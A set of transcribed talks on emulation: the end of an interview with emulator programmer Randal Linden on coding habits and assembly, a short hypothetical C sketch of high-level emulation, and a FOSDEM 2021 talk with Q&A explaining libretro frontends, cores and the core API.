the documentation, but exactly. But yeah, so you've held on to that quite long. Yes, yes. Since we first released, way back in 1998, 99, something like that. Yeah. I think you've been programming longer than I've been alive. And there's a good question here. No. From Pegasus again: you mentioned you're an organized person. Would you care to share any organization tips, if you have anything? Good. Good question. I'm an organized person. You have to sort of be, when you're looking at code, when you're designing code, when you're architecting. They say for a carpenter, measure twice, cut once. With programming, the best advice I could give is don't start typing. 
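Circling back to the high-level-emulation idea earlier in this exchange (emulating a console's software libraries rather than its chips): the usual trick is to recognize known library entry points in the guest and service them on the host instead of emulating the code behind them. The sketch below is purely hypothetical; the addresses, structure layout, and host functions are all invented and do not describe any shipping emulator.

/* High-level-emulation sketch (hypothetical).  When guest execution reaches
 * a known library entry point, skip the guest code and do the work on the
 * host, then pretend the library call returned.                            */
#include <stdint.h>

struct guest_cpu {
    uint32_t pc;          /* guest program counter          */
    uint32_t ra;          /* guest return-address register  */
    uint32_t arg[4];      /* guest argument registers       */
};

/* Invented guest-side addresses of two library routines. */
#define LIB_DRAW_TRIANGLE 0x8C010040u
#define LIB_PLAY_SOUND    0x8C0100A0u

/* Host-side implementations (hypothetical). */
extern void host_draw_triangle(uint32_t a, uint32_t b, uint32_t c);
extern void host_play_sound(uint32_t id);

/* Returns 1 if the call was handled at high level, 0 to fall back to
 * low-level emulation of the guest code at 'cpu->pc'.                      */
int hle_dispatch(struct guest_cpu *cpu)
{
    switch (cpu->pc) {
    case LIB_DRAW_TRIANGLE:
        host_draw_triangle(cpu->arg[0], cpu->arg[1], cpu->arg[2]);
        cpu->pc = cpu->ra;            /* behave as if the library returned  */
        return 1;
    case LIB_PLAY_SOUND:
        host_play_sound(cpu->arg[0]);
        cpu->pc = cpu->ra;
        return 1;
    default:
        return 0;
    }
}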
A lot of people are anxious to, to get into programming and start typing and get some results. But what you'll hit is what is typically known as the 80 20 rule. It takes 20% of the time to get 80% of the way there. It's another 80% of the time to get to your 20% to finish something off. So by being organized by, by making notes, by thinking things through carefully by considering possible alternatives. And in the long run, we'll save you coding. It's rare that it's rare that I'm happy with with. I don't want to say that I'm unhappy with the code that I've written. But there's always room for improvement. There's always better code. And so I always come across different ways of doing things. And, and that's one advantage of having taken notes. I can look back at my notes and think, oh yeah. This was another way of doing something. I also keep what I call a to do file. It's literally just a text file. And so when I think of something, I put it in my to do file, and then I come back to it later and sometimes things never end up getting implemented. But, but other times, it allows me time to think about how I would go about doing something. And then I come back to it afterwards. And I just say one thing because I do both the notes and the to do file and I can neither understand my notes or understand my to do files. But, but, but on the more serious side, because you know, we talked about, you know, how your code was documented, especially the doom code or doom code, right. And I wanted to ask something, because this is always a discussion in the programming world. So do you start with documentation or start with code. I actually document while I'm coding. I once remember writing some code and somebody was watching me as I type I'm a fast type is I can do typically 140 words a minute. I mean, you program assembly, you have to be a fast like this. Otherwise, you would be a program for years. Exactly. Exactly. So I'm a very, very fast coder. But I will typically know what I want to accomplish before I actually go ahead and start typing. So that when I'm typing, I'm typing and I'm commenting at the same time. A lot of the the the doom for super effects code is a good example. And I've gotten better at code coding and documenting since then. But, in inevitably, you'll end up going back and having to modify code or change code. And I've found that every so often I'll write something that's complicated, and then I'll have to go back to it. And even though it's complicated because I've documented what's going on or my thought process as part of the code itself. It makes it possible for me to add some new feature or or make some change that's that's necessary. In the past when I thought to myself, oh, I'll just whip something up and get it running and then I'll tweak it later. Invariably, I end up having to rewrite the code because it it it worked for what I wanted it to do. But I've often found that the code rarely is in a fixed state you sort of you, you know what you want to accomplish. If you've accomplished it, there's always something that in the future you come back to check. Yeah, actually, this relates to the final prepared question that I had. And after that, it's just silly things. So you released the doom effects code on the GitHub and I had a look and it looks really neat. And I was wondering how much like tidying up that you do or was it just this is this was the code and you released it as is. I released the code as is nice. Yeah, thank you. 
Yeah, a couple of people have commented, some people that I respect very much. Like Becky Heineman, of Bard's Tale. She did Doom for the 3DO. Somebody that I respect tremendously has looked at the code, and she said, wow, it's very nice and it's well organized and it's a real tight code base. Yeah, I literally took the code as is and put it out there. We keep getting back to doom, so I want to ask something very quick while Nils is finding the question. No, because, you know, because you basically reverse engineered doom to implement it. So because there are a lot of stories back then about somebody just emailing id: hey guys, I want to port doom to whatever, and they get a reply with the source code. So why didn't that happen for you guys? Or did you try that? I don't know, how did that go? I basically wrote the development system and worked on the platform that was used by another team that was writing Dirt Trax FX. And while they were working on that, in my spare time, I was working on doom. And I came into Sculptured one day and I had a prototype that was fully operational, and I said, here it is. Let's approach id Software and see if they're interested. I have a comment from somebody that is a writer; when you were talking about the documentation, he commented: literate programming, is it not? Then I asked him, you mean like the Knuth concept, and he said yes. So are you familiar with that concept? I'm not. I'm not familiar with it; what is it? Yeah, I'm not quite sure about this actually. Sorry. I know quite a bit about this subject actually, take it away. I'm interested. I love learning something new all the time. So check out what Knuth wrote about it. But the nicest thing that I know is usually the code will contain, for example, markdown-formatted documentation. And you'll be reading the markdown file, like for example in your browser, and it will say, by the way, this code can be executed, because it's also the source code for the program. And the blocks of documentation, they're just separated. And then you sort of weave all the source code together at the end and you can just run it, but it's the same file, which is beautiful, I think. Yes, my code... if you see my code, it is very much like that. It's sort of the comments describe the flow in general. And then, in addition, on specific lines of code, I describe the specifics of why I'm doing certain things, but I'll also have big blocks of here's, you know, what this huge block of code is about to do. And here's a couple of steps that it's going to take, and then in the code itself there'll be additional comments on individual steps, especially if the steps are, like I said, with arm assembly, where you can do a bunch of complicated operations. Also avoid magic numbers. Avoid sticking constants in your code; always have them as definitions, equates, things like that. That's just another useful tip. Yes, exactly. And at the end of that discussion... yeah, I have to add something because, you know, I can't help myself, but I mean, because somebody with your, how do I say this nicely, with your affinity for precision, you know, and for detail and such. I mean, why would you program in assembly? I mean, by definition assembly is not really the most readable language on the planet, right? So it was largely a function of requirements. Especially with a project like BLEEM, or like Cyboyd. The target platform was such that assembly was the only way to really accomplish what needed to be done. 
You could write a dynamic optimizing recompiler in C these days. Absolutely. But back then, when your target hardware was a Pentium 100 with a Voodoo 3D graphics card, it was such a low-end machine that writing in assembly was really the only way to do it. I got my start writing 6502 on the Commodore 64 and just stuck with it. These days, it is an absolute pleasure to write in C#. You
|
In this interview/conversation, acclaimed emulator programmer Randal Linden takes us on a journey down the depths of reverse engineering and emulator development. Rather than editing this conversation to fit a smaller time-slot, it is split across 3 parts, with a Live Q&A at the end of part 3. Part 3 highlights: Windows 95 Bleemcast! Learning reverse & emulator engineering
|
10.5446/53645 (DOI)
|
Hello and welcome to Libretro, one API to bring them all. This is for the Fostum 2021 conference. I'm so excited to be here. My name is Rob Loach and today we'll be covering everything about RetroArch, Libretro, and the modularization that it brings to the table. Since Fostum has gone remote, if you have any questions, definitely write them down and come prepared to the live Q&A later on. Or simply yell at me on Twitter. It's always fun. So, as I mentioned, my name is Rob Loach. I am part of the Libretro team members. I'm a web nerd and open source evangelist. I've been in the web industry for about 15 years and have always loved game development and retro video games. I'm Rob Loach on Twitter, GitHub, and YouTube, so feel free to reach out to me there. But I am not the only one who's represented in this presentation. I want to make a big shout out to the Libretro theme. It spans across about 15 people and more. We depend on lots of contributions. For this talk, I do want to shout out TwinFX, Gouchi, Gadsby, and Kivitor for their help and contribution to these slides. Libretro is available at libretro.com. So check that out. And with that, let's talk about emulation. There are so many emulators out there. It's absolutely incredible to see how far it's come over the past few years. Being able to run older software on new hardware is essential in order for archival and digital preservation. There's Dolphin for Gamecube and Wii, PCSX2 for PlayStation 2 emulation, PPSSPP for PlayStation Portable, Desmune for DS, Nostopia, FCEUX for Nintendo. It goes on and on and on. There's so many emulators out there, and it's so exciting to see. And even outside the emulation world, there's also a whole bunch of game frameworks out there, and engines like Pico 8 or Doom with PR Boom, Scum VM for all of the amazing classic adventure games, and even more, even more. But this causes a problem for users. As a user, it can be cumbersome to set up all of the different emulators. Each application has its own settings, input configuration, graphical user interface. So it can be difficult for new users to set up all of these different applications for each system. And in addition, it's also difficult for emulation developers. It's cumbersome to have to manage your own window, your own window logic, input, video, and audio playback. On top of that, how can you guarantee that your application will run well across different platforms? There's Windows, Mac OS, Linux on the desktop. What about mobile? Can you run your application on the web? How about smaller hardware like the Raspberry Pi? There are a lot of things to consider when you're developing your own emulator. So along comes Libretro. Yeah, and this talk will be covering what it means to be a Libretro front-end. We'll also be talking about what Libretro cores are, the Libretro API is covering some of the basics of that, and the ecosystem surrounding Libretro. So let's talk through some of the front-ends involved. A front-end is essentially a program that implements the Libretro API and interacts with Libretro cores. There are a bunch of front-ends out there that can interact with Libretro cores, and I'll talk about some of those here. The first one up on the list is RetroArch. It's the primary reference for Libretro. It's available on Windows, Mac, Linux, Raspberry Pi, Android, iOS. There's a slew of different platforms that run RetroArch. So head over to RetroArch.com to see if it's available for your platform. 
Some of the favorite features that I have for RetroArch are NetPlay. Being able to run Retro video games through NetPlay brings a lot of the memories of Couch Co-op and Couch Multiplayer. I love that. Being able to play Retro video games over the Internet is pretty awesome. Rewind is really cool. It lets you, in real time, reverse actions that you have taken in games. If you misallege in Mario or something, just rewind a couple seconds and try again. So cool. Input run-ahead is also really, really awesome. When you're playing a game, it will take your input and apply those inputs to previous frames. So it gives you the illusion of reduced input lag. It just feels so much more responsive when you hit a jump button and it instantly happens. Really awesome to see. And on the web, you can run RetroArch through the web using M-scripten. Just head over to web.retroarch.com and you'll see there's not as many features as the desktop application, but it's awesome to be able to run some of these cores on the web. LACA is awesome. LACA is a Linux distribution based off of LibraElec. I think that's what it's called. And it makes it so that when you boot up the device, it instantly goes into RetroArch. What makes it unique is that it runs on so many different devices, from the desktop to small CPU boards, like the Raspberry Pi or the Odroid, to even handheld devices like the RetroFlag GPi case. LACA is an awesome solution for that. So I highly recommend you check it out. Ludo. Ludo was written in Go. Its aim is to keep the most basic features to allow other people to learn how to design and build their own front end from scratch. I love how snappy and simplistic it is. It's very easy to load it up and get a sense of how to add your content to it and use it. Again, very basic, minimal front end. Great for ease of use. And speaking of ease of use, Nome Games is an interesting one. It's focused on the Nome environment. And having it just focused on that desktop environment means that it can take really great advantage of the environment itself. It's very easy to use. The user interface is very stripped down. And it's still relatively early on in the Nome Games development cycle too. So have a look if you have any ideas on what should be implemented as part of it. I also wanted to make a shout out for Kodi. Kodi's been doing some really interesting things with their retro player. Some examples of how cool this is is that you can just in your own media center in Kodi, you can add your own games library and then browse them directly using your controller. And it's awesome. Still very early on as well. But I just wanted to make a shout out to Kodi and retro player. There's even more front ends available as well. Arcane is a desktop environment that brings libretro directly into the Linux distribution. Actually, I'm not sure if it's a Linux distribution. Someone will have to correct me on that. You let me on Twitter or something if I'm getting that wrong, but I just love seeing libretro used in places outside of just a single application. Bizhawk is heavily used in the tool assisted speed run community. MU VR is a virtual reality application that you can when you enter this virtual reality, you're, you're sitting in front of a CRT TV, which I just love. I love that. And Lemmy Roy is a is a Andrew Android based open source application project. Which really adopts some of the graphical user interface features around Android. So it fits seamlessly in a mobile setting. So that's that's it on front ends. 
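Since a frontend is described above as a program that implements the libretro API and interacts with cores, here is a deliberately tiny sketch of the frontend side of that contract: load a core as a shared library and resolve its entry points by name. This is hypothetical POSIX glue (dlopen; on Windows it would be LoadLibrary), not code from RetroArch or any of the frontends above, and a real frontend must also register the environment, video, input and audio callbacks before driving the core.

```c
#include <dlfcn.h>
#include <stdio.h>

int main(void)
{
   /* "some_core.so" stands in for whichever libretro core you have built. */
   void *core = dlopen("./some_core.so", RTLD_LAZY);
   if (!core) { fprintf(stderr, "%s\n", dlerror()); return 1; }

   /* Every core exports the same retro_* symbols, so a frontend can drive
      any of them through the same handful of function pointers. */
   void (*core_init)(void)   = (void (*)(void))dlsym(core, "retro_init");
   void (*core_run)(void)    = (void (*)(void))dlsym(core, "retro_run");
   void (*core_deinit)(void) = (void (*)(void))dlsym(core, "retro_deinit");

   /* Callback registration via retro_set_environment and friends belongs
      here; it is omitted to keep the sketch readable. */
   core_init();
   for (int frame = 0; frame < 60; frame++)
      core_run();               /* one call per video frame */
   core_deinit();

   dlclose(core);
   return 0;
}
```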
But what are libretro cores? A libretro core is a program that exposes the meat of its application through the libretro API as a dynamically linked library. All of these applications can still have their own standalone implementations; the dynamically linked library allows frontends to use the libretro API to interact with them in a modularized fashion. There are a number of cores out there, split across a few different categories. I'll just cover emulators, media players, and game engines or game frameworks for this talk. Some of my favorite emulators out there: I'd like to shout out Mesen for NES. There's higan for SNES, mGBA for Game Boy Advance, ParaLLEl for N64, PCSX2 for PlayStation 2. These are just a few examples of emulators that have created libretro cores, and while the standalone application exists, the libretro core allows libretro frontends to use them. DOSBox here is also one of the most recent cores added to the list, and it kind of blows my mind. It gives you the ability to load DOS games directly from a zip file and adds cheat support; having the ability to rewind directly in a DOS game is hilarious to see as well. So cool, you should definitely check it out. While many people know libretro and RetroArch for emulators, it goes beyond emulators. You can also use it to load media through some of the media libretro cores out there. And since you can load up video files, you get the advantage of using some of the features that RetroArch gives you, like shaders. In this example here, you can see we're applying a VHS filter to Big Buck Bunny. Really cool, I like that. I like VHSes. Anyway, outside of media and emulators, there's also a whole slew of different game engines and game frameworks that implement libretro cores. One of the benchmarks for hardware is: does it run Doom? Well, yes: libretro has a PrBoom core, so you can run Doom through any libretro frontend. There's also a ScummVM core. I grew up loving Monkey Island, so the ScummVM core is definitely one of my favorites. And if you're looking for a game to play, I definitely recommend Cave Story. It's a beautiful and fun Metroidvania made by Pixel, and it's free. The libretro core for it is open source as well, so you can download it directly through the content downloader. And TIC-80 is a small 2D game development framework; many people use it to prototype small games. I built the libretro core for TIC-80, and being able to run my own games on a handheld device is just so gratifying, so cool. So, I'm in the way of the slide here, but I made this Dangerous Dave game in TIC-80 and you can run that through the libretro core for it. So yeah, really cool. So how does all of this work? How can you create your own libretro core? Well, I could speak about this for hours, so I'm only going to cover the basics of setting up a dynamically linked library with libretro. I'm going to talk about some of the libretro callbacks, video rendering, input checking, and audio concepts. So let's get into some of those. A libretro core is essentially a dynamically linked compiled library that implements the libretro.h header file. It takes function declarations from libretro.h and defines those functions as callbacks so that frontends can call them. Libretro provides a standard Makefile that you can use. A Makefile is essentially just a definition file describing how a program should be compiled; there are many different uses of it. The libretro Makefile is pretty standard. 
It lets you compile for all of these different platforms, so that's one that I use heavily. In the examples we'll be talking about here, we will be making a potatoes core. Yes, potatoes. So if we're setting up a potatoes core, the first thing you'll need to do is create a potatoes.c file and define the retro_get_system_info callback. When a frontend boots up a libretro core, it will call this function just to acquire some information about what the core is, like the library name. In this case, we have potatoes as the library name, the core name. We're also defining the version and any valid extensions; in this case, we'll be loading .potato files. And what happens when we start to run and load this core? All libretro frontends will call the retro_init function, and in this function you would put any initialization that you have for your core. There's also an environment callback: retro_set_environment will give you an environment function that you can call to grab information from the frontend. In this case, we are setting that the core does not need a game to load, so it will just run without content. But if you are loading a game, you can use the retro_load_game callback. It takes one of two things: either a data buffer, or a direct path to the content that you're loading. And there's also retro_unload_game, for when the content is unloading and you want to close it. So what does this look like if we're to run it? When you run a core, the frontend repeatedly calls the retro_run callback, and in that callback you're expected to update the game logic, update any input that you have, display the game, and maybe play some audio. But what does it look like if we run it like this? If we compile our potatoes.c file into a potatoes.so or DLL file and run it with retroarch -L potatoes.so (or potatoes.dll), it looks like this: a blank black screen. That's so exciting; we're making progress. But yeah, let's get some video happening here. Video is really important. If we want to display something in our core, we use the retro_get_system_av_info callback. This sets up how many frames per second the retro_run callback will be called; in this case, we're setting it to 60, so 60 frames a second. We're also setting the width and height of the core, how the video will be shown; in this case, 320 by 240 is good. And there's a link to the libretro-samples repository that has a whole bunch of the samples that I'm talking about here, so head over to the libretro-samples repo. Now that we have our audio and video information set, we can render our content. In this case, we will be rendering a checkerboard. It goes line by line and sets the pixels into a frame buffer. In this case, the frame buffer is an array of unsigned integers, four bytes (32 bits) per pixel, and each value encodes one colour pixel. Once we've filled the frame buffer, we send it off to the video callback function. So what does this look like when we run it? When we run this core, we have two options: we either load it directly through the interface using the load core function, or we run it through the command line. In this case, I ran retroarch -L potatoes.so, just like we saw before. (A rough sketch of the whole potatoes.c built up so far follows below.)
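The slides themselves aren't reproduced in this transcript, so here is a minimal reconstruction of what the potatoes.c described above might look like, assuming the standard declarations in libretro.h. It also registers the input and audio callbacks that the talk turns to next; the audio here is just silence, whereas the talk's example plays a tone. This is illustrative glue only, not the speaker's actual code, and a real core must additionally implement the remaining entry points declared in libretro.h (retro_api_version, retro_deinit, retro_reset, the serialization stubs, and so on).

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
#include "libretro.h"

static retro_environment_t   environ_cb;
static retro_video_refresh_t video_cb;
static retro_input_poll_t    input_poll_cb;
static retro_input_state_t   input_state_cb;
static retro_audio_sample_t  audio_cb;

static uint32_t fb[240][320];   /* XRGB8888 frame buffer */
static int      offset;         /* scrolled by the joypad, just to show input */

void retro_set_environment(retro_environment_t cb)
{
   environ_cb = cb;
   bool no_game = true;   /* run even when no .potato file is loaded */
   cb(RETRO_ENVIRONMENT_SET_SUPPORT_NO_GAME, &no_game);
}
void retro_set_video_refresh(retro_video_refresh_t cb) { video_cb = cb; }
void retro_set_input_poll(retro_input_poll_t cb)       { input_poll_cb = cb; }
void retro_set_input_state(retro_input_state_t cb)     { input_state_cb = cb; }
void retro_set_audio_sample(retro_audio_sample_t cb)   { audio_cb = cb; }

void retro_get_system_info(struct retro_system_info *info)
{
   memset(info, 0, sizeof(*info));
   info->library_name     = "potatoes";
   info->library_version  = "0.1";
   info->valid_extensions = "potato";
}

void retro_get_system_av_info(struct retro_system_av_info *info)
{
   memset(info, 0, sizeof(*info));
   info->timing.fps            = 60.0;
   info->timing.sample_rate    = 44100.0;
   info->geometry.base_width   = 320;
   info->geometry.base_height  = 240;
   info->geometry.max_width    = 320;
   info->geometry.max_height   = 240;
   info->geometry.aspect_ratio = 4.0f / 3.0f;
}

void retro_init(void) { /* one-time setup would go here */ }

bool retro_load_game(const struct retro_game_info *game)
{
   (void)game;   /* NULL when running without content */
   enum retro_pixel_format fmt = RETRO_PIXEL_FORMAT_XRGB8888;
   return environ_cb(RETRO_ENVIRONMENT_SET_PIXEL_FORMAT, &fmt);
}

void retro_run(void)
{
   /* Input: ask the frontend to refresh, then query the joypad. */
   input_poll_cb();
   if (input_state_cb(0, RETRO_DEVICE_JOYPAD, 0, RETRO_DEVICE_ID_JOYPAD_UP))
      offset++;   /* "move the potato up" */

   /* Video: paint a checkerboard line by line and hand it to the frontend. */
   for (int y = 0; y < 240; y++)
      for (int x = 0; x < 320; x++)
         fb[y][x] = (((x / 16) + ((y + offset) / 16)) & 1) ? 0xFFFFFFFFu : 0xFF000000u;
   video_cb(fb, 320, 240, sizeof(fb[0]));

   /* Audio: one frame's worth of silence at 44.1 kHz (left, right). */
   for (int i = 0; i < 44100 / 60; i++)
      audio_cb(0, 0);
}
```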
So what does it look like? Hey, we have a checkerboard. Yeah, it's really gratifying to see something actually happen on the screen in our core. So check it out; the libretro-samples repo will have all of this code available. And what about input? We talked about video; what about input? We use the retro_set_input_poll function, which gives us a poll function: when we call it, the frontend will update any input that's required. And then, following that, there's the input state callback, and this input state callback will tell us information about the input. So in this case, we're checking if the up button is pressed on our gamepad, and if it is, we can do something like move the potato up, which is very exciting. All libretro cores can support joypads, mouse, keyboards, and touch pointers as well. Audio is supported as well. In this example, we are calling the audio callback with a solid tone. Let me see if I can get this running so that you can hear it. It's just a solid tone, but let's see if this works. So I just compiled our core; it's not on the screen, but I just compiled it. Now I'll run it, and hopefully you'll hear a sound. A solid sound. I like that. Very cool. So that's essentially creating your own sound, a solid tone, and this is called every frame, so you have to set up the audio to do it. There are some audio cores out there that you can use as samples; you can load an MP3 file into this audio buffer and then play the MP3. It's up to you. So beyond audio, video, and input, what are some other concepts that we can accomplish with the libretro API? Some of my favorites include serialization. With serialization, what you do is load all of the game state, everything about the current state of the running core, into a serialized object, and that allows frontends like RetroArch to handle state saves. It's also what's used for netplay and input run-ahead. So once you implement the serialization buffer, that allows your core to have save slots, which is really cool. Rendering as well. Cheats are in there, with retro_cheat_set. Memory manipulation. You can also unlock your frame rate: in our potatoes example we were running at 60 frames a second, but you can unlock the frame rate. There's also a virtual file system as part of libretro.h; check it out. You can send messages directly to the frontend so they appear as on-screen messages. And for the libretro API there are many different implementations and integrations with different languages and platforms. There's C++, there's Rust, there's Go. People have made one implemented in Pascal. Pascal? Is that how you say it? Yeah, implemented in Pascal. And check out the libretro-samples repo again; definitely go and try making your own integrations, like Node.js or Emscripten, and definitely reach out to me, I've been very interested in the web side of this lately as well. So beyond the frontends, cores, and the libretro API, what does the ecosystem around libretro look like? I'll be speaking about assets, the joypad autoconfig, the database system, and the buildbot right here. So, the assets. RetroArch comes with so many different assets associated with it: there are themes, there are overlays that people apply, different wallpapers, even audio for the menus. There are so many different assets that people need, and a lot of these are contributed by users, so definitely get involved with the asset system. There's also autoconfig. 
When you plug in a gamepad, when you plug in a gamepad, Retro-H will automatically search all of the device and product IDs in the auto-config and configure your joypad for you. There's so many different gamepads out there. So if you have a unique one that is not auto-configured with Retro-H, definitely get involved with the Retro-H joypad auto-config. We'll add it and then you won't have to configure your device. It'll just do it for you. There's also the database system. In Retro-H you can scan content and it'll automatically add it into playlists for you. It's based on the CRC or the serial if it's disk media. Once those are defined as part of the database, Retro-H can scan the content and automatically add it in the playlist. So if there's some content that's missing, certainly visit the Libretro database repository and make an issue. We can add it in. And the Buildbot. The Buildbot is awesome. I love the Buildbot. It's a continuous integration server to build Retro-H in all of its cores. There's a new infrastructure for it as well. It's just so much faster. Big thanks to M4XW who really led that effort. It automatically builds Retro-H for Windows, for Android, for M-Scripten, Mac OS. Yeah, it's pretty amazing. And there will be a new blog post coming up within the next month detailing everything about the Buildbot. So stay tuned for that. So what's next for Libretro? We've covered front-ends, what a Libretro core is, how to make your own core, and some of the ecosystem. Since its inception as SSNES and LibSNES, Libretro has grown much beyond its upbringings. Libretro and Retro-H provide a way to connect different applications, emulators, and game engines together in a single application. So what's next for the project? We want to expand the Buildbot, finish the ARM Linux cores, Mac OS 64-bit binaries, and add more support for building more cores. We want to expand on the Steam release. The playtest is out, so keep watch for when you can get your own key to that. But we're looking to push that Steam release up. There's also the hardware support. LACA runs on so many different platforms and systems out there, but there's definitely more to come. And we also want to support your own cores. They're adding a Libretro core to your own application, expands the user base, allowing for more portability on different platforms, and it also gives you access to a larger developer base as well. So certainly work on adding Libretro cores to your own emulators and applications out there. So that's it for me today. Thank you so much for joining me to talk about Libretro. I want to make a shout out to Blackbeard334, TwinFX, Gatsby, and Kivitar for all of their help on setting up these slides. My name is Rob Loach. Definitely reach out to me on Twitter. I always love hearing interesting ways that people are using Libretro, so definitely give me a shout. I hope to publish more of these videos on YouTube as well, so let me know what you'd like to see. There will be a live Q&A session later on this week, so if you have any questions, reach out, queue them up, and we'll make it happen. Libretro and RetroArch are available at retroarch.com. They've been publishing some incredible videos on their YouTube channel as well, so check those out. And thank you to Fostum. This has been so exciting. I'm looking forward to seeing more talks this week, and it's been such an honor. So thank you so much. We'll see you soon. Bye. Yeah, I hope they have new booths, so how do you think over in the Q&A? 
I think we're going to be going into the Q&A now. Yeah, I think we're live now. Have a little time to play. I think we are live. Are we live? Yeah, we're live. We are live. Hello, everybody. Alright, so unfortunately Rob was not able to make it, but we are getting somebody else who will stand in for him. This is all very last minute. We're very happy to get this replacement's seat that works out. Bear with us for a moment as we invite him to the Matrix channel. I'm compiling all the questions that you've asked. I think we've also found a fix for the camera only tracking the moderators. See if that works. Yeah, I believe so. Okay, we have the stand-in Q&A speaker in the chance, not yet in the room. I'm going to have to read to grab a drink. Yeah, Sylvia, there's not too much to compile. I see. Can you hear me? Yes, I can. We're setting things up with the stand-in. Very, very last minute, so please bear with us and let's hope it works. I'm not sure if you can hear me, but it's already in the chat, and we're trying to get voice working or video or anything working. So we will publish Rob's address and you can send him your questions. And you finally have the Q&A thing working. The speaker's not there. We've got four questions. Rob just came online, so let's see if we can get Rob. Let's see if he responds. I think it's really early in the US, right? Yeah. It's like 8am, something like that. How much time do we have? Oh, there would be another 20 minutes. Neil, sing something or entertain our guests while we find Rob, please. You're going to poop me on the spot like that? Who else? I actually have some questions ready for Rob as well. I've been using this for, I don't even know how long, retro arch. I think the first advice I ran it on was a PSP or something. I can, I don't even know when. Hey, it's working. No way. Wow, that's great. I'm very happy to hear you, Rob. We found it. You were just about to make me sing some songs. So I'm actually, oh, you want to want to sing a song. I'm actually starting to get my throat actually starting to croak up a bit. So let's, let's skip the song. Okay, great. So everybody saw your talk. And, well, let's just dive straight into the questions, right? I'm just going to talk to bottom here. So I've got here a quick one. Will you port Libretto to the mega 65 with a wink at the end? Ooh, the mega 65 that would be amazing. There's a, it's actually really funny. It's hilarious to me to see people port retro arch and and like Libretto to crazy different embedded systems. I love it when I see, when I see it emulate itself as well as pretty fun, funny to see. Yeah, I'm always interested in seeing, seeing really crazy ports happen. Mega 65 I haven't, I haven't heard someone try it out but I'd love to see that happen. Would you be the guy to call or would it be somebody else? I think I've already started the porting processes for for lots of systems. I did port it to, I got, wait, let me see if I can find it. Thank you to the tick 80. Right. We're getting some new questions. I got it running on my on this on the retro flag GPI. It's pretty awesome. The, this is the retro flag GPI. It's running on a Raspberry Pi zero. So you can install Laka on it and then it just runs pretty awesome. But that's a really cheap one right the little five dollar one, I think. Yeah. Yeah, five dollars. The case was probably $40 ish. But once it's running, it's pretty awesome. Yeah, so you have the, the simple gooey up there. Oh yeah, gotcha. Yeah. 
Yeah, so you can run a run cave story on this thing. There we go. Boom. Yeah, that's great. Cool. Yeah. I'm going to throw another question at you from Marcus week. Yeah, right. Yeah, here we go. So a previous speaker said that the emu devs are going to write a debugger to analyze the behavior of emulated games. What are the plans of retro arch to support such interfaces in an abstract way. Can you do something about that? Oh yeah, that's a good question. So, uh, LeBretro and retro art, they have some like memory, memory searching and debugging that you can do. And then you can do the call back. I think it's like memory get descriptors or something. Let me check what it's called. But as soon as your core implements the memory management stuff, front ends can grab certain memory through the core and do some really cool stuff. And people have built upon that. Lara Dell is he's a, he does some really cool work. Let me see if I can post a link to it inside the chat, but he's been working on a hackable console, which will do some really cool memory tricks in there. I'm going to post the URL to it. And this little, he's been posting some really awesome awesome screenshots of what he's been working on. So he's been focused on the Z 80 or Z 80 debugger for it. And then he, here's a, there's a tweet with a screenshot of him debugging all of the memory in the, in the disassembler kind of kind of blows my mind. That's a little cool stuff. In the later bedrooms everybody else can see them. There we go. Yeah. Yeah, people can get these links now. All right, cool. I think we got another question that seemed to get quite a couple of votes. One second. That was by Sylvia asks very early on. In case you're wondering I'm scrolling up because there's a lot of talk. All right, so I noticed that retro arch seems to have forks of many, many emulators with libretto included. How does the retro arts community make sure that patches are properly contributed back upstream and upstream is not alienated. That's a great question and one that I think is very important, making sure that we push up push up any changes that we make in the core fork up to the upstream repo repo that's very important. There have been times when, when we've, we've tried to take on a fork of a core, and then there's some like C99 changes that we want to make that are not, I'd say, appropriate for the, for the upstream. So we do try to work with people to make sure that we are pushing up changes that that make sense. There's been a whole bunch of contributions that we, we try to make I I've been trying to keep the forks as close to the actual upstream code as possible. There's a libretto mirrors organization that we've used for this. So, post a link to it in the emulators developers. There we go. So this libretto mirrors organization. This is where we, we host a lot of the, the, the get mirrors of a lot of the projects. So, for instance, blast them, I think it's hosted on on Git lab, I could be wrong. But there's been cases where there's a, an emulator that we want to build off of that's not using Git. So SVN for instance, we'd have to make a get mirror, and then build off of this get mirror. But that gives us a, a clean path to build patches and push those patches upstream. Yeah, so that's, that's definitely important. I'm glad that you asked that, but keeping the core in line with what's going on in the upstream. It's very clear answer. Thanks for that. 
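For reference, the memory interface the speaker is reaching for in this answer is exposed by cores through libretro.h; he recalls it under a slightly different name, so treat the shape below as my reading rather than his. The simplest form is a pair of core exports, and a hypothetical frontend-side tool, having resolved the symbols from the core, could inspect the emulated system RAM roughly like this (the richer descriptor-based memory-map interface also exists but is not shown):

```c
#include <stddef.h>
#include <stdio.h>
#include "libretro.h"

/* Cores export these two functions; RETRO_MEMORY_SYSTEM_RAM selects the
   emulated machine's main RAM (save RAM and others have different IDs). */
static void peek_system_ram(void)
{
   unsigned char *ram  = retro_get_memory_data(RETRO_MEMORY_SYSTEM_RAM);
   size_t         size = retro_get_memory_size(RETRO_MEMORY_SYSTEM_RAM);

   if (!ram || !size)
      return;                      /* the core chose not to expose its RAM */

   /* A debugger or cheat-search tool would scan or watch these bytes. */
   printf("system RAM: %zu bytes, first byte = %02x\n", size, ram[0]);
}
```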
I can't find it anymore but I think somebody also asks, why is emulation station not listed in your, when you were listing a couple of the front ends I think. Yeah, emulation station, I love emulation station. Emulation station. So for those of you who don't know, it gives you just a, like a, it's pretty much just a user interface in order to launch external applications. And with emulation station you can list a whole bunch of, you can add emulators, a whole bunch of lists of games and stuff and you can launch retro art from there. I didn't list it because it, I would like to list it a liberator front end. A lot of it has to do with implementing the liberator API directly in the application and emulation station it, it doesn't really implement the liberator API it just launches the internal applications. And it does kind of make sense, kind of as a front end but in reality it's just launching retro or any other liberal retro front end that you want to run. But it is, it is very similar. Yeah, I agree. Yeah, so that's the difference between a liberal retro front end and a, like a program launcher. Yeah, yeah. Let's see if there are any more questions and otherwise I'm just going to talk to you. I've been using retro arch for the longest time, like I said I used it on PSP I think I used it on PS3, at least PS3. Oh yeah. Yeah, that was a hassle to. Is it possible that I use it on PS2. Possible on the PS2. I would be surprised if it's not possible. But it just seems that this project just, it just keeps on going and going and so my question is sort of leading up to this. Oh, there is. So, there is a PS2 port. Oh, there is. Yeah. This is so long ago but I've got a PS2 here with like the big, the gray IDE cable at the back so you could look up a hard drive to it and stuff. Yeah. It's like a hilarious. I believe that I was using it there too. But yeah, you could run it on the UYA. The UYA is the. Google UYA, that thing? I don't know that thing. The thing that kicked off the Kickstarter's way back in the day. Yeah, the UYA was the pinnacle of retro gaming on a console. 